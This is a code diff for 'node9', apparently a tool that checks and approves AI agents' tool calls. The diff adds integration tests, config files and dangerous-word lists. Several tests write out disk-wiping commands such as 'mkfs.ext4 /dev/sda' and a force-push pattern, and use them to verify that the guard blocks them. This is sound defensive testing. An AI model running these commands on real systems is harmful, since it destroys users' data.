diff --git a/node9.config.json_ b/node9.config.json_ deleted file mode 100644 index b04906f..0000000 --- a/node9.config.json_ +++ /dev/null @@ -1,90 +0,0 @@ -{ - "version": "1.0", - "settings": { - "mode": "standard" - }, - "policy": { - "dangerousWords": [ - "drop", - "destroy", - "purge", - "rmdir", - "push", - "force" - ], - "ignoredTools": [ - "list_*", - "get_*", - "read_*", - "describe_*", - "read", - "write", - "edit", - "multiedit", - "glob", - "grep", - "ls", - "notebookread", - "notebookedit", - "todoread", - "todowrite", - "webfetch", - "websearch", - "exitplanmode", - "askuserquestion", - "agent", - "task*" - ], - "toolInspection": { - "bash": "command", - "shell": "command", - "run_shell_command": "command", - "terminal.execute": "command" - }, - "rules": [ - { - "action": "rm", - "allowPaths": [ - "**/node_modules/**", - "**/node_modules", - "dist/**", - "dist", - "build/**", - "build", - ".next/**", - ".next", - ".nuxt/**", - ".nuxt", - "coverage/**", - "coverage", - ".cache/**", - ".cache", - "tmp/**", - "tmp", - "temp/**", - "temp", - "**/__pycache__/**", - "**/__pycache__", - "**/.pytest_cache/**", - "**/.pytest_cache", - "**/*.log", - "**/*.tmp", - ".DS_Store", - "**/yarn.lock", - "**/package-lock.json", - "**/pnpm-lock.yaml" - ] - } - ] - }, - "environments": { - "production": { - "requireApproval": true, - "slackChannel": "#general" - }, - "development": { - "requireApproval": true, - "slackChannel": "#general" - } - } -} diff --git a/node9.config.json__ b/node9.config.json__ deleted file mode 100644 index b0f6339..0000000 --- a/node9.config.json__ +++ /dev/null @@ -1,93 +0,0 @@ -{ - "version": "1.0", - "settings": { - "mode": "standard", - "approvers": { - "native": false - } - }, - "policy": { - "dangerousWords": [ - "drop", - "destroy", - "purge", - "rmdir", - "push", - "force" - ], - "ignoredTools": [ - "list_*", - "get_*", - "read_*", - "describe_*", - "read", - "write", - "edit", - "multiedit", - "glob", - "grep", - "ls", - "notebookread", - "notebookedit", - "todoread", - "todowrite", - "webfetch", - "websearch", - "exitplanmode", - "askuserquestion", - "agent", - "task*" - ], - "toolInspection": { - "bash": "command", - "shell": "command", - "run_shell_command": "command", - "terminal.execute": "command" - }, - "rules": [ - { - "action": "rm", - "allowPaths": [ - "**/node_modules/**", - "**/node_modules", - "dist/**", - "dist", - "build/**", - "build", - ".next/**", - ".next", - ".nuxt/**", - ".nuxt", - "coverage/**", - "coverage", - ".cache/**", - ".cache", - "tmp/**", - "tmp", - "temp/**", - "temp", - "**/__pycache__/**", - "**/__pycache__", - "**/.pytest_cache/**", - "**/.pytest_cache", - "**/*.log", - "**/*.tmp", - ".DS_Store", - "**/yarn.lock", - "**/package-lock.json", - "**/pnpm-lock.yaml" - ] - } - ] - }, - "environments": { - "production": { - "requireApproval": true, - "slackChannel": "#general" - }, - "development": { - "requireApproval": true, - "slackChannel": "#general" - } - } -} diff --git a/package-lock.json b/package-lock.json index 63e63c4..7c1e37e 100644 --- a/package-lock.json +++ b/package-lock.json @@ -14,7 +14,8 @@ "commander": "^14.0.3", "execa": "^9.6.1", "picomatch": "^4.0.3", - "sh-syntax": "^0.5.8" + "sh-syntax": "^0.5.8", + "zod": "^3.25.76" }, "bin": { "node9": "dist/cli.js" @@ -9529,6 +9530,15 @@ "funding": { "url": "https://github.com/sponsors/sindresorhus" } + }, + "node_modules/zod": { + "version": "3.25.76", + "resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz", + "integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/colinhacks" + } } } } diff --git a/package.json b/package.json index 9553da6..2c8db0b 100644 --- a/package.json +++ b/package.json @@ -70,7 +70,8 @@ "commander": "^14.0.3", "execa": "^9.6.1", "picomatch": "^4.0.3", - "sh-syntax": "^0.5.8" + "sh-syntax": "^0.5.8", + "zod": "^3.25.76" }, "devDependencies": { "@anthropic-ai/sdk": "^0.78.0", diff --git a/src/__tests__/check.integration.test.ts b/src/__tests__/check.integration.test.ts new file mode 100644 index 0000000..2a1ab24 --- /dev/null +++ b/src/__tests__/check.integration.test.ts @@ -0,0 +1,744 @@ +/** + * Integration tests for `node9 check` CLI command. + * + * These tests spawn the real built CLI subprocess (`dist/cli.js`) with an + * isolated HOME directory so each test controls the exact config in play. + * No mocking — the full pipeline from JSON parsing → policy evaluation → + * authorizeHeadless → exit code runs as-is. + * + * Requirements: + * - `npm run build` must be run before these tests (the suite checks for dist/cli.js) + * - Tests set NODE9_NO_AUTO_DAEMON=1 to prevent daemon auto-start side effects + * - Tests set NODE9_TESTING=1 to disable interactive approval UI (terminal/browser/native + * racers return early so tests complete without waiting for human input) + * - Tests set HOME to a tmp directory per test group to isolate config state + */ + +import { describe, it, expect, beforeAll, beforeEach, afterEach } from 'vitest'; +import { spawnSync, spawn } from 'child_process'; +import fs from 'fs'; +import os from 'os'; +import path from 'path'; +import http from 'http'; + +// ── Helpers ─────────────────────────────────────────────────────────────────── + +const CLI = path.resolve(__dirname, '../../dist/cli.js'); + +interface RunResult { + status: number | null; + stdout: string; + stderr: string; +} + +/** + * Synchronous runner — safe only when no in-process mock server is involved, + * because spawnSync blocks the event loop (preventing the mock server from + * responding to requests from the child process). + * + * cwd defaults to os.tmpdir() (not the project root) so the subprocess never + * picks up the repo's own node9.config.json and inherits only the HOME config + * written by makeTempHome(). Pass tmpHome explicitly to keep both HOME and cwd + * consistent. + */ +function runCheck( + payload: object | string, + env: Record = {}, + cwd = os.tmpdir(), + timeoutMs = 8000 +): RunResult { + const payloadArg = typeof payload === 'string' ? payload : JSON.stringify(payload); + const result = spawnSync(process.execPath, [CLI, 'check', payloadArg], { + encoding: 'utf-8', + timeout: timeoutMs, + cwd, // avoid loading the repo's own node9.config.json + env: { + ...process.env, + NODE9_NO_AUTO_DAEMON: '1', + NODE9_TESTING: '1', + ...env, + }, + }); + return { + status: result.status, + stdout: result.stdout ?? '', + stderr: result.stderr ?? '', + }; +} + +/** + * Async runner using spawn — required when the test hosts a mock HTTP server + * in the same process, since spawnSync would block the event loop and prevent + * the server from handling requests from the child. + * + * Accepts either an object (serialized to JSON) or a raw string (passed as-is), + * allowing tests to exercise the CLI's JSON-parse error path. + */ +function runCheckAsync( + payload: object | string, + env: Record = {}, + cwd = os.tmpdir(), + timeoutMs = 8000 +): Promise { + const payloadArg = typeof payload === 'string' ? payload : JSON.stringify(payload); + return new Promise((resolve) => { + // Guard against double-resolve: child.on('close') fires even after child.kill() + let resolved = false; + const settle = (result: RunResult) => { + if (!resolved) { + resolved = true; + resolve(result); + } + }; + + const child = spawn(process.execPath, [CLI, 'check', payloadArg], { + cwd, + env: { + ...process.env, + NODE9_NO_AUTO_DAEMON: '1', + NODE9_TESTING: '1', + ...env, + }, + }); + + let stdout = ''; + let stderr = ''; + child.stdout.on('data', (d: Buffer) => (stdout += d.toString())); + child.stderr.on('data', (d: Buffer) => (stderr += d.toString())); + + const timer = setTimeout(() => { + child.kill(); + settle({ status: null, stdout, stderr }); + }, timeoutMs); + + child.on('close', (code) => { + clearTimeout(timer); + settle({ status: code, stdout, stderr }); + }); + }); +} + +/** Write a config.json into a temp HOME `.node9` directory. Returns the HOME path. */ +function makeTempHome(config: object): string { + const tmpHome = fs.mkdtempSync(path.join(os.tmpdir(), 'node9-test-')); + const node9Dir = path.join(tmpHome, '.node9'); + fs.mkdirSync(node9Dir, { recursive: true }); + fs.writeFileSync(path.join(node9Dir, 'config.json'), JSON.stringify(config)); + return tmpHome; +} + +/** Write raw text (may be invalid JSON) directly into the config file. */ +function makeTempHomeRaw(content: string): string { + const tmpHome = fs.mkdtempSync(path.join(os.tmpdir(), 'node9-test-')); + const node9Dir = path.join(tmpHome, '.node9'); + fs.mkdirSync(node9Dir, { recursive: true }); + fs.writeFileSync(path.join(node9Dir, 'config.json'), content); + return tmpHome; +} + +function cleanupHome(tmpHome: string) { + fs.rmSync(tmpHome, { recursive: true, force: true }); +} + +// ── Pre-flight: ensure the binary is built ──────────────────────────────────── + +beforeAll(() => { + if (!fs.existsSync(CLI)) { + throw new Error( + `dist/cli.js not found. Run "npm run build" before running integration tests.\nExpected: ${CLI}` + ); + } +}); + +// ── 1. Ignored tools → fast-path allow ─────────────────────────────────────── + +describe('ignored tools fast-path', () => { + let tmpHome: string; + beforeEach(() => { + tmpHome = makeTempHome({ + settings: { mode: 'standard', autoStartDaemon: false }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('glob is ignored → approved with no block output', () => { + const r = runCheck( + { tool_name: 'glob', tool_input: { pattern: '**/*.ts' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + // "glob" is an ignored tool — no review message, just silently allowed + expect(r.stderr).not.toContain('blocked'); + }); + + it('read is ignored → approved', () => { + const r = runCheck( + { tool_name: 'read', tool_input: { file_path: '/tmp/test.txt' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + }); + + it('webfetch is ignored → approved', () => { + const r = runCheck( + { tool_name: 'webfetch', tool_input: { url: 'https://example.com' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + }); + + it('task* wildcard — task_drop_all_tables is fast-pathed to allow', () => { + // "task*" is in ignoredTools; a tool name that looks dangerous but matches + // the pattern must still be silently allowed (the pattern is opt-in by the user) + const r = runCheck( + { tool_name: 'task_drop_all_tables', tool_input: {} }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); // no block JSON + expect(r.stderr).not.toContain('blocked'); + }); + + it('task* wildcard + dangerous word in input → ignoredTools wins (silently allowed)', () => { + // Security note: ignoredTools is an explicit opt-in by the operator. When a tool + // matches an ignoredTools pattern, it is fast-pathed BEFORE dangerousWords are + // evaluated. This is intentional — ignoredTools means "trust this tool completely". + // Operators should not add write-capable or destructive tools to ignoredTools unless + // they are certain those tools are safe. The test below documents this precedence. + const r = runCheck( + { tool_name: 'task_execute', tool_input: { query: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); // no block JSON — ignoredTools took precedence + expect(r.stderr).not.toContain('blocked'); + }); +}); + +// ── 2. Smart rules ──────────────────────────────────────────────────────────── + +describe('smart rules', () => { + let tmpHome: string; + beforeEach(() => { + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { + smartRules: [ + { + name: 'block-force-push', + tool: 'bash', + conditions: [ + { field: 'command', op: 'matches', value: 'git push.*(--force|-f\\b)', flags: 'i' }, + ], + conditionMode: 'all', + verdict: 'block', + reason: 'Force push blocked by policy', + }, + { + name: 'allow-readonly-bash', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: '^\\s*(ls|cat|grep|find|echo)', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'allow', + reason: 'Read-only command', + }, + ], + }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('force push → blocked with JSON decision:block in stdout', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'git push origin main --force' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); // CLI always exits 0; block is communicated via stdout JSON + const parsed = JSON.parse(r.stdout.trim()); + expect(parsed.decision).toBe('block'); + expect(r.stderr).toContain('blocked'); + }); + + it('readonly bash → allowed with checkedBy in stderr', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls -la /tmp' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + expect(r.stderr).toContain('allowed'); + }); +}); + +// ── 3. Dangerous words ──────────────────────────────────────────────────────── + +describe('dangerous words', () => { + let tmpHome: string; + beforeEach(() => { + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { + dangerousWords: ['mkfs', 'shred'], + }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('command with mkfs → blocked (no approval mechanism → block)', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sdb' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + const parsed = JSON.parse(r.stdout.trim()); + expect(parsed.decision).toBe('block'); + expect(r.stderr).toContain('blocked'); + }); + + it('safe command without dangerous word → allowed', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'echo hello world' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + // Should either be silently allowed (empty stdout) or show "allowed" + if (r.stdout.trim()) { + const parsed = JSON.parse(r.stdout.trim()); + expect(parsed.decision).not.toBe('block'); + } + }); +}); + +// ── 4. No approval mechanism ────────────────────────────────────────────────── + +describe('no approval mechanism', () => { + let tmpHome: string; + beforeEach(() => { + // All approvers off, no cloud API key — any "review" verdict has nowhere to go + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { + dangerousWords: ['mkfs'], + }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('risky tool with no mechanism → blocked JSON output', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + const parsed = JSON.parse(r.stdout.trim()); + expect(parsed.decision).toBe('block'); + }); +}); + +// ── 5. Audit mode ───────────────────────────────────────────────────────────── + +describe('audit mode', () => { + let tmpHome: string; + beforeEach(() => { + tmpHome = makeTempHome({ + settings: { + mode: 'audit', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { dangerousWords: ['mkfs'] }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('risky tool in audit mode → allowed with checkedBy:audit', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + expect(r.stderr).toContain('[audit]'); + expect(r.stderr).toContain('allowed'); + }); + + it('non-flagged tool in audit mode → approved silently', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls -la' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + }); +}); + +// ── 6. Audit mode + cloud gating (auditLocalAllow) ──────────────────────────── + +describe('audit mode + cloud gating', () => { + let tmpHome: string; + let mockServer: http.Server; + let auditCalls: object[]; + let serverPort: number; + + beforeEach(async () => { + auditCalls = []; + await new Promise((resolve) => { + mockServer = http.createServer((req, res) => { + let body = ''; + req.on('data', (chunk) => (body += chunk)); + req.on('end', () => { + if (req.url === '/audit' && req.method === 'POST') { + try { + auditCalls.push(JSON.parse(body)); + } catch { + /* ignore */ + } + res.writeHead(200, { 'Content-Type': 'application/json' }); + res.end(JSON.stringify({ ok: true })); + } else { + res.writeHead(404); + res.end(); + } + }); + }); + mockServer.listen(0, '127.0.0.1', () => { + serverPort = (mockServer.address() as { port: number }).port; + resolve(); + }); + }); + + tmpHome = makeTempHome({ + settings: { + mode: 'audit', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: true, terminal: false }, + }, + policy: { dangerousWords: ['mkfs'] }, + }); + + // Write credentials pointing at our mock server + fs.writeFileSync( + path.join(tmpHome, '.node9', 'credentials.json'), + JSON.stringify({ apiKey: 'test-key-123', apiUrl: `http://127.0.0.1:${serverPort}` }) + ); + }); + + afterEach(async () => { + cleanupHome(tmpHome); + await new Promise((resolve) => mockServer.close(() => resolve())); + }); + + it('audit mode + cloud:true + API key → POSTs to /audit endpoint', async () => { + // auditLocalAllow is awaited in core.ts before process.exit(0), so by the + // time runCheckAsync resolves (process closed) the POST is already complete. + // No sleep needed — if it races here, it's a production bug too. + const r = await runCheckAsync( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toContain('[audit]'); + expect(auditCalls.length).toBeGreaterThan(0); + }); + + it('audit mode + cloud:false → does NOT POST to /audit', async () => { + // Overwrite config with cloud:false + fs.writeFileSync( + path.join(tmpHome, '.node9', 'config.json'), + JSON.stringify({ + settings: { + mode: 'audit', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { dangerousWords: ['mkfs'] }, + }) + ); + + const r = await runCheckAsync( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toContain('[audit]'); + expect(auditCalls.length).toBe(0); + }); +}); + +// ── 7. Config validation — malformed JSON ───────────────────────────────────── + +describe('config validation — malformed JSON', () => { + let tmpHome: string; + afterEach(() => cleanupHome(tmpHome)); + + it('literal newline in JSON string → warning on stderr + falls back to defaults', () => { + // Create a JSON file with a literal newline inside a string value (like the real bug) + const badJson = + '{"settings":{"mode":"standard"},"policy":{"smartRules":[{"name":"bad","tool":"bash","conditions":[{"field":"command","op":"matches","value":"^ls\n"}],"verdict":"allow"}]}}'; + tmpHome = makeTempHomeRaw(badJson); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls -la' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + // Should warn about parse failure + expect(r.stderr).toMatch(/Failed to parse|Invalid config|Using default/i); + }); + + it('completely invalid JSON → warning on stderr + exits cleanly', () => { + tmpHome = makeTempHomeRaw('not valid json at all {{{'); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls -la' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toMatch(/Failed to parse|Using default/i); + }); +}); + +// ── 8. Config validation — Zod schema warnings ─────────────────────────────── + +describe('config validation — Zod schema warnings', () => { + let tmpHome: string; + afterEach(() => cleanupHome(tmpHome)); + + it('unknown top-level key → Zod warning on stderr', () => { + tmpHome = makeTempHome({ + settings: { mode: 'standard', autoStartDaemon: false }, + unknownKey: 'should-warn', + }); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toMatch(/Invalid config|unknown/i); + }); + + it('invalid mode value → Zod warning on stderr', () => { + tmpHome = makeTempHome({ + settings: { mode: 'bad-mode', autoStartDaemon: false }, + }); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toMatch(/Invalid config|mode/i); + }); + + it('invalid smart rule op → Zod warning', () => { + tmpHome = makeTempHome({ + settings: { mode: 'standard', autoStartDaemon: false }, + policy: { + smartRules: [ + { + tool: 'bash', + conditions: [{ field: 'command', op: 'invalid-op', value: 'ls' }], + verdict: 'allow', + }, + ], + }, + }); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toMatch(/Invalid config|op/i); + }); + + it('valid config → no Zod warnings', () => { + tmpHome = makeTempHome({ + version: '1.0', + settings: { mode: 'standard', autoStartDaemon: false }, + policy: { dangerousWords: ['mkfs'] }, + }); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).not.toMatch(/Invalid config|Failed to parse/i); + }); +}); + +// ── 9. Cloud race engine (mock SaaS) ───────────────────────────────────────── + +describe('cloud race engine', () => { + let tmpHome: string; + let mockServer: http.Server; + let serverPort: number; + + function startMockSaas(decision: 'allow' | 'deny'): Promise { + return new Promise((resolve) => { + mockServer = http.createServer((req, res) => { + let body = ''; + req.on('data', (c) => (body += c)); + req.on('end', () => { + if (req.url === '/' && req.method === 'POST') { + // Initial check submission → signal pending, return a requestId for polling + res.writeHead(200, { 'Content-Type': 'application/json' }); + res.end(JSON.stringify({ pending: true, requestId: 'mock-request-id' })); + } else if (req.url?.startsWith('/status/') && req.method === 'GET') { + // Status poll → return final status in the format the poller expects + const status = decision === 'allow' ? 'APPROVED' : 'DENIED'; + res.writeHead(200, { 'Content-Type': 'application/json' }); + res.end(JSON.stringify({ status, approvedBy: 'test@example.com' })); + } else { + res.writeHead(404); + res.end(); + } + }); + }); + mockServer.listen(0, '127.0.0.1', () => { + serverPort = (mockServer.address() as { port: number }).port; + resolve(); + }); + }); + } + + afterEach(async () => { + cleanupHome(tmpHome); + if (mockServer) await new Promise((resolve) => mockServer.close(() => resolve())); + }); + + it('cloud approves → allowed with checkedBy:cloud', async () => { + await startMockSaas('allow'); + + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: true, terminal: false }, + approvalTimeoutMs: 3000, + }, + policy: { dangerousWords: ['mkfs'] }, + }); + + fs.writeFileSync( + path.join(tmpHome, '.node9', 'credentials.json'), + JSON.stringify({ apiKey: 'test-key', apiUrl: `http://127.0.0.1:${serverPort}` }) + ); + + const r = await runCheckAsync( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome, + 10000 + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + expect(r.stderr).toMatch(/\[cloud\].*allowed/i); + }); + + it('cloud denies → blocked JSON output', async () => { + await startMockSaas('deny'); + + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: true, terminal: false }, + approvalTimeoutMs: 3000, + }, + policy: { dangerousWords: ['mkfs'] }, + }); + + fs.writeFileSync( + path.join(tmpHome, '.node9', 'credentials.json'), + JSON.stringify({ apiKey: 'test-key', apiUrl: `http://127.0.0.1:${serverPort}` }) + ); + + const r = await runCheckAsync( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome, + 10000 + ); + expect(r.status).toBe(0); + const denied = JSON.parse(r.stdout.trim()); + expect(denied.decision).toBe('block'); + }); +}); + +// ── 10. Malformed payload to `node9 check` ─────────────────────────────────── + +describe('malformed JSON payload', () => { + // The CLI argument is a trust boundary: any process can call `node9 check `. + // + // Design decision: malformed payloads "fail open" (exit 0, no block output). + // Rationale: hooks run inline before every tool call; a transient JSON serialization + // error (e.g. payload truncated mid-send) must NOT block the user's AI session. + // The failure is logged to ~/.node9/hook-debug.log when NODE9_DEBUG=1. + // + // These tests verify the failure is graceful (no uncaught exception / stack trace). + + it('non-JSON string → fails open (exit 0, no crash)', () => { + const r = runCheck('not-valid-json', {}, os.tmpdir()); + expect(r.status).toBe(0); // fail-open: allow rather than hard-block on parse error + expect(r.stderr).not.toContain('TypeError'); + expect(r.stderr).not.toContain('at Object.'); + }); + + it('empty string payload → fails open (exit 0, no crash)', () => { + const r = runCheck('', {}, os.tmpdir()); + expect(r.status).toBe(0); + expect(r.stderr).not.toContain('TypeError'); + expect(r.stderr).not.toContain('at Object.'); + }); + + it('partial JSON object → fails open (exit 0, no crash)', () => { + const r = runCheck('{"tool_name":"bash"', {}, os.tmpdir()); + expect(r.status).toBe(0); + expect(r.stderr).not.toContain('TypeError'); + }); +}); diff --git a/src/__tests__/cli_runner.test.ts b/src/__tests__/cli_runner.test.ts index d9574b9..089ead4 100644 --- a/src/__tests__/cli_runner.test.ts +++ b/src/__tests__/cli_runner.test.ts @@ -113,8 +113,9 @@ describe('smart runner — shell command policy', () => { }); it('blocks when command contains dangerous word in path', async () => { + // mkfs is in DANGEROUS_WORDS — triggers review even as a token in a find command const result = await evaluatePolicy('shell', { - command: 'find . -name "*.log" -exec purge {} +', + command: 'find /dev -name "sd*" -exec mkfs.ext4 {} +', }); expect(result.decision).toBe('review'); }); @@ -130,8 +131,8 @@ describe('smart runner — shell command policy', () => { describe('autoStartDaemon: false — blocks without daemon when no TTY', () => { it('returns noApprovalMechanism when no API key, no daemon, no TTY', async () => { mockNoNativeConfig(); - // Changed 'delete_user' -> 'drop_user' - const result = await authorizeHeadless('drop_user', {}); + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); expect(result.noApprovalMechanism).toBe(true); }); @@ -140,11 +141,11 @@ describe('autoStartDaemon: false — blocks without daemon when no TTY', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - // Changed 'delete_user' -> 'drop_user' - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'allow' }) : '' + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'allow' }) : '' ); - const result = await authorizeHeadless('drop_user', {}); + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(true); }); @@ -152,11 +153,11 @@ describe('autoStartDaemon: false — blocks without daemon when no TTY', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - // Changed 'delete_user' -> 'drop_user' - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'deny' }) : '' + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'deny' }) : '' ); - const result = await authorizeHeadless('drop_user', {}); + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); }); }); @@ -166,8 +167,8 @@ describe('autoStartDaemon: false — blocks without daemon when no TTY', () => { describe('daemon abandon fallthrough', () => { it('returns noApprovalMechanism when daemon is not running and no other channels', async () => { mockNoNativeConfig(); - // Changed 'delete_user' -> 'drop_user' - const result = await authorizeHeadless('drop_user', {}); + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); expect(result.noApprovalMechanism).toBe(true); }); @@ -193,8 +194,8 @@ describe('daemon abandon fallthrough', () => { }) ); - // Changed 'delete_user' -> 'drop_user' - const result = await authorizeHeadless('drop_user', {}); + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); }); }); diff --git a/src/__tests__/context-sniper.test.ts b/src/__tests__/context-sniper.test.ts new file mode 100644 index 0000000..1207dfc --- /dev/null +++ b/src/__tests__/context-sniper.test.ts @@ -0,0 +1,250 @@ +import { describe, it, expect } from 'vitest'; +import { extractContext, smartTruncate, computeRiskMetadata } from '../context-sniper.js'; + +// ── smartTruncate ───────────────────────────────────────────────────────────── + +describe('smartTruncate', () => { + it('returns the string unchanged when it is within the limit', () => { + const s = 'hello world'; + expect(smartTruncate(s, 500)).toBe(s); + }); + + it('returns the string unchanged when it is exactly the limit', () => { + const s = 'a'.repeat(500); + expect(smartTruncate(s, 500)).toBe(s); + }); + + it('truncates long strings and inserts " ... " in the middle', () => { + const s = 'a'.repeat(600); + const result = smartTruncate(s, 500); + expect(result).toContain(' ... '); + expect(result.length).toBeLessThan(s.length); + }); + + it('keeps the start and end of a long string', () => { + const s = 'START' + 'x'.repeat(600) + 'END'; + const result = smartTruncate(s, 500); + expect(result.startsWith('START')).toBe(true); + expect(result.endsWith('END')).toBe(true); + }); + + it('uses 500 as the default maxLen', () => { + const s = 'x'.repeat(600); + const result = smartTruncate(s); + expect(result).toContain(' ... '); + }); +}); + +// ── extractContext ──────────────────────────────────────────────────────────── + +describe('extractContext', () => { + /** Build a string with N lines, each being "line_N". */ + function makeLines(count: number): string { + return Array.from({ length: count }, (_, i) => `line_${i + 1}`).join('\n'); + } + + it('returns full text when it has 7 or fewer lines', () => { + const text = makeLines(7); + const { snippet, lineIndex } = extractContext(text, 'line_4'); + expect(snippet).toBe(text); + expect(lineIndex).toBe(-1); + }); + + it('returns full text (truncated) when no matchedWord is given', () => { + const text = makeLines(20); + const { lineIndex } = extractContext(text); + expect(lineIndex).toBe(-1); + }); + + it('returns a 7-line window centred on the matched word', () => { + const text = makeLines(20); // "line_1\nline_2\n..." + // 'line_10' is at index 9 (0-based); window should be 7 content lines + const { snippet } = extractContext(text, 'line_10'); + // Content lines contain 'line_N'; head/tail markers contain 'hidden' + const contentLines = snippet.split('\n').filter((l) => l.includes('line_')); + expect(contentLines.length).toBe(7); + expect(contentLines.some((l) => l.includes('line_10'))).toBe(true); + }); + + it('marks the hit line with the 🛑 emoji', () => { + const text = makeLines(20); + const { snippet } = extractContext(text, 'line_10'); + // The 🛑 marker should appear exactly once on the hit line + const markedLine = snippet.split('\n').find((l) => l.startsWith('🛑')); + expect(markedLine).toBeDefined(); + expect(markedLine).toContain('line_10'); + }); + + it('lineIndex is the 0-based offset of the hit line within the extracted window', () => { + const text = makeLines(20); + const { snippet, lineIndex } = extractContext(text, 'line_15'); + // lineIndex is relative to the content window (head prefix is separate). + // The content window lines are those that include 'line_' (not the head/tail markers). + expect(lineIndex).toBeGreaterThanOrEqual(0); + const windowLines = snippet.split('\n').filter((l) => l.includes('line_')); + 